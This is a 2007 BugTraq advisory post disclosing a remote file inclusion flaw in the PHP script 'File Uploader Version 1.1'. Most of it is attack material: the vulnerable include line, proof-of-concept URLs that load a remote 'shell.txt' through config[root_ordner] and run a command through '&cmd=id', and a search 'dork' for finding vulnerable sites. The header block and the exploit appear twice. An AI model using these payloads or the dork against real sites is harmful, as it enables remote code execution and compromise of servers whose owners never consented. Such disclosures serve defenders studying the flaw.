BugTraq
Back to list
|
Post reply
File Uploader Version 1.1 Remote Command Execution Vulnerability
Aug 09 2007 04:18PM
rizgar linuxmail org
File Uploader Version 1.1 Remote Command Execution Vulnerability
-----------------------------------------------------------------------
Script : File Uploader Version
Version : 1.1
Site : http://www.mapos-scripts.de
Founder : Rizgar
Contact : rizgar (at) linuxmail (dot) org [email concealed] and irc.gigachat.net #kurdhack
Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)
d0rk : "Copyright (c) 2007 by Mapos-Scripts.de",
-----------------------------------------------------------------------
include($config["root_ordner"].'includes/function.php');
POC
http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?
&cmd=id
http://www.site.com/path/datei.php?config[root_ordner]=http://shell.txt?
&cmd=id
EOF
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
-----------------------------------------------------------------------
Script : File Uploader Version
Version : 1.1
Site : http://www.mapos-scripts.de
Founder : Rizgar
Contact : rizgar (at) linuxmail (dot) org [email concealed] and irc.gigachat.net #kurdhack
Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)
d0rk : "Copyright (c) 2007 by Mapos-Scripts.de",
-----------------------------------------------------------------------
include($config["root_ordner"].'includes/function.php');
POC
http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?
&cmd=id
http://www.site.com/path/datei.php?config[root_ordner]=http://shell.txt?
&cmd=id
EOF
[ reply ]